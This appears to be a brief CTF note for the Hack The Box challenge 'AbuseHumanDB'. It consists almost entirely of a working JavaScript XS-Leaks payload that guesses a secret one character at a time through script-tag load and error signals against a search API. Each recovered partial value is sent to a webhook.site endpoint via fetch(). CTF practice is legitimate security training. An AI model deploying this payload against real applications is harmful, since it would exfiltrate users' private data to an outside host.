Need to read:

Example: HTB - AbuseHumanDB

Payload

<script>
var ip = '127.0.0.1:1337';
var hook = 'webhook.site/<your-id>';
var flag = 'HTB{';
var printable = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ{}!@$%\"\'_';
var special = '_%\"\'';
var url = `http://${ip}/api/entries/search?q=`

async function getPartialFlag(char){
    return new Promise((resolve, reject) => {
        const script = document.createElement('script');
        script.src = url + encodeURIComponent(flag + char);
        script.onload = () => char==='}' ? reject(char):resolve(char);
        script.onerror = () => reject(char);
        document.head.appendChild(script);
    });
}

async function getFlag(chars) {
    for (let index = 0; index < 10; index++) {
        var brk = false; var char;
        for (var i = 0; i < chars.length; i++) {
            char = special.includes(chars[i]) ? '\\'+chars[i]:chars[i];
            await getPartialFlag(char).then((res) => { flag = flag.concat(res); brk = res=='}' ? true:false; i=0 } , (res) => {} );
            if(brk) break;
        }
        fetch(`http://${hook}/flag=${flag}`, {method: 'get'});
        flag=flag.concat('_');
    }
};

getFlag(printable);

</script>